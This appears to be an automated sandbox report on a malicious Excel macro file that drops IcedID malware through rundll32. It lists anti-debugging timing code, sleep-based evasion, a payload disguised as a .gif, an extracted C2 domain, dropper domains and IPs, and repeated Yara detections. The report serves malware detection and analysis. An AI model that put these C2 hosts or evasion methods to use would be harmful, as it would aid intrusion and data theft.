Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C95 second address: 00000000002B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1B94 rdtsc

3_2_003B1B94

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		3_2_003B1F94
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		7_2_002B1F94

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe

Window / User API: threadDelayed 668

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif			Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1B94 rdtsc

3_2_003B1B94

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 143.204.3.74 187	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\rundll32.exe	Domain query: usaaforced.fun

Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1D48 LookupAccountNameW,

3_2_003B1D48

Stealing of Sensitive Information:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
50.87.146.86	columbia.aula-web.net	United States	46606	UNIFIEDLAYER-AS-1US	false
199.79.62.99	tajushariya.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
192.185.214.87	partsapp.com.br	United States	46606	UNIFIEDLAYER-AS-1US	false
143.204.3.74	dr49lng3n1n2s.cloudfront.net	United States	16509	AMAZON-02US	false
192.185.48.186	metaflip.io	United States	46606	UNIFIEDLAYER-AS-1US	false

Private

IP
192.168.2.255

Contacted Domains

Name	IP	Active
metaflip.io	192.185.48.186	true
tajushariya.com	199.79.62.99	true
columbia.aula-web.net	50.87.146.86	true
dr49lng3n1n2s.cloudfront.net	143.204.3.74	true
partsapp.com.br	192.185.214.87	true
agenbolatermurah.com	unknown	unknown
usaaforced.fun	unknown	unknown
tvorartificialnature.xyz	unknown	unknown
aws.amazon.com	unknown	unknown

AV Detection:

Found malware configuration

Source: 3.2.rundll32.exe.390000.0.raw.unpack

Malware Configuration Extractor: IcedID {"C2 url": "usaaforced.fun"}

Multi AV Scanner detection for submitted file

Source: document-1251000362.xlsm

Metadefender: Detection: 13%

Perma Link

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 192.185.48.186:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.214.87:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.146.86:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.79.62.99:443 -> 192.168.2.22:49172 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 3003[1].gif.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: metaflip.io

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.48.186:443

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: usaaforced.fun

Outdated Microsoft Office dropper detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: agenbolatermurah.com is down
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	DNS query: agenbolatermurah.com is down

Performs DNS queries to domains with low reputation

Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
